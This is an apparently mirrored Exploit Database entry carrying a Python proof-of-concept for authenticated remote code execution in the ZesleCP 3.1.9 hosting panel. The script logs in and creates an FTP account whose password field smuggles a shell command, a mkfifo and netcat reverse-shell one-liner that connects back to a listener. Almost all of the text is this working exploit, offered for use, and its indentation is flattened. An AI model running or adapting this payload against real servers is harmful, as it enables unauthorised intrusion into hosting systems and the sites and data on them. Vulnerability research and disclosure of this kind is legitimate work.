ZesleCP 3.1.9 – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 13 阅读

• 作者： numan türle
  日期： 2021-08-30
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50233/

• # Title: ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
  # Date: 27.08.2021
  # Author: Numan Türle
  # Vendor Homepage: https://zeslecp.com/
  # Software Link: https://zeslecp.com/
  # Version: <=3.1.9
  # https://www.youtube.com/watch?v=5lTDTEBVq-0
  
  #!/usr/bin/python3
  # -*- coding: utf-8 -*-
  # ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )
  # author: twitter.com/numanturle
  # usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD
  # https://www.youtube.com/watch?v=5lTDTEBVq-0
  
  
  import argparse,requests,warnings,json,random,string
  from requests.packages.urllib3.exceptions import InsecureRequestWarning
  from cmd import Cmd
  
  warnings.simplefilter('ignore',InsecureRequestWarning)
  
  def init():
  parser = argparse.ArgumentParser(description='ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )')
  parser.add_argument('-u','--host',help='Host', type=str, required=True)
  parser.add_argument('-l', '--login',help='Username', type=str, required=True)
  parser.add_argument('-p', '--password',help='Password', type=str, required=True)
  args = parser.parse_args()
  exploit(args)
  
  def exploit(args):
  
  listen_ip = "0.0.0.0"
  listen_port = 1337
  
  session = requests.Session()
  target = "https://{}:2087".format(args.host)
  username = args.login
  password = args.password
  
  print("[+] Target {}".format(target))
  
  login = session.post(target+"/login", verify=False, json={"username":username,"password":password})
  login_json = json.loads(login.content)
  
  if login_json["success"]:
  session_hand_login = session.cookies.get_dict()
  
  print("[+] Login successfully")
  print("[+] Creating ftp account")
  
  ftp_username = "".join(random.choices(string.ascii_lowercase + string.digits, k=10))
  
  print("[+] Username : {}".format(ftp_username))
  
  print("[+] Send payload....")
  
  payload = {
  "ftp_user": ftp_username,
  "ftp_password":"1337';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;echo '".format(listen_ip,listen_port)
  }
  
  try:
  feth_weblist = session.post(target+"/core/ftp", verify=False, json=payload, timeout=3)
  except requests.exceptions.ReadTimeout: 
  pass
  
  print("[+] Successful")
  else:
  print("[-] AUTH : Login failed msg: {}".format(login_json["message"]))
  
  if __name__ == "__main__":
  init()